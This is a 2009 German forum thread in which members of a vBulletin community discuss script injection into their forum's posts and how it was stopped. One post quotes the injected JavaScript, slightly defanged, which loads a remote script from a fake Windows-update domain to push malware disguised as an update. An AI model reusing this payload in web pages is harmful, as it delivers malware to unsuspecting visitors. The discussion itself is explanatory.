Forum infiziert!

**Fabpicard** · 19.07.2009, 19:42

Zitat von Redbull

da ist noch nicht mal ein link drin in dem beitrag, was macht ihr hier für einen alarm? :o

Beitrag wurde gelöscht und User gesperrt...

Allerdings hatte als es ausfiel der einzige Mod der gerade aktiv war, keine Rechte im BOS-Forum um auch den Beitrag zu löschen ;)

MfG Fabsi

**Alex22** · 19.07.2009, 19:46

Zitat von Redbull

da ist noch nicht mal ein link drin in dem beitrag, was macht ihr hier für einen alarm? :o

Man braucht kein Link, der Browser versucht in vestimmten Fällen automatisch was nachzuladen.

**MasterOfFire** · 19.07.2009, 20:07

joa und alles durch den scanner beim hochladen ?? glaube das würde viel speicher und zeit dauern .....

**Shinzon** · 19.07.2009, 21:15

Sagt mal, kann mir jemand eine "von Hand" Anleitung zur Installation dieses Trojaners
geben ? Mein Linux will und will den einfach nicht automatisch starten ^^

Ich glaube, all die Apfel-User da draussen können von dem Problem auch dasselbe Lied
singen ..

All die nette Software, die sich automatisch aufdrängen will, und ich kann sie einfach
nicht nutzen :-(

**Der Achtundvierziger** · 19.07.2009, 21:50

Bei Äpfeln und Pinguinen kommt halt nicht alles durchs "Fenster" geflogen ;)

**bastelheini** · 19.07.2009, 22:42

kann mir jmd als zufriedener windows nutzer erklären wie diese art angriff überhaupt funktioniert und keine sicherheitsmaßnahmen greifen?

**Firefighter Heiti** · 19.07.2009, 22:56

Schwachstelle in der Forensoftware suchen, finden &nutzen-->javascript code einfüge-->Voila der Browser meldet Update

**bastelheini** · 19.07.2009, 23:13

ah und wie wird der eingefügt?

was in den beitrag geschrieben oder während der beitrag an den server gesendet wird?

**Firefighter Heiti** · 19.07.2009, 23:21

ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.

**Newty** · 20.07.2009, 01:11

Zitat von Firefighter Heiti

ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.

Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein

Code:

{script}
Hier Schadcode nach wahl
{/script}

benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hier

EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht

**bastelheini** · 20.07.2009, 01:16

achso...

ich dachte auch das die software sowas filtert....

naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?

**Pipsi** · 20.07.2009, 01:46

Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:

XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>")

**Firefighter Heiti** · 20.07.2009, 01:51

Zitat von Pipsi

Würde mich interessieren, was er damit bezwecken will....

Ein BOT-Netz aufbauen :)

hier wird der gute Glaube und der Up-to-date Sinn der Internetnutzer ausgenutzt.

Zitat von getreu dem Motto

"Von Adobe, das kann ja nicht falsch sein."

**abc-truppe** · 20.07.2009, 11:36

Zitat von bastelheini

achso...

ich dachte auch das die software sowas filtert....

naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?

Sie filterts nicht, weil sie's nicht erkennt, ob es was Schadhaftes ist oder solche netten Hinweis-Boxen wie wir Mods sie gerne verwenden.

Ist aber nun alles deaktiviert.

**bastelheini** · 20.07.2009, 11:49

achso:)

kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?

Thema: Forum infiziert!

Themen-Optionen

Anzeige

Aktive Benutzer

Aktive Benutzer

Berechtigungen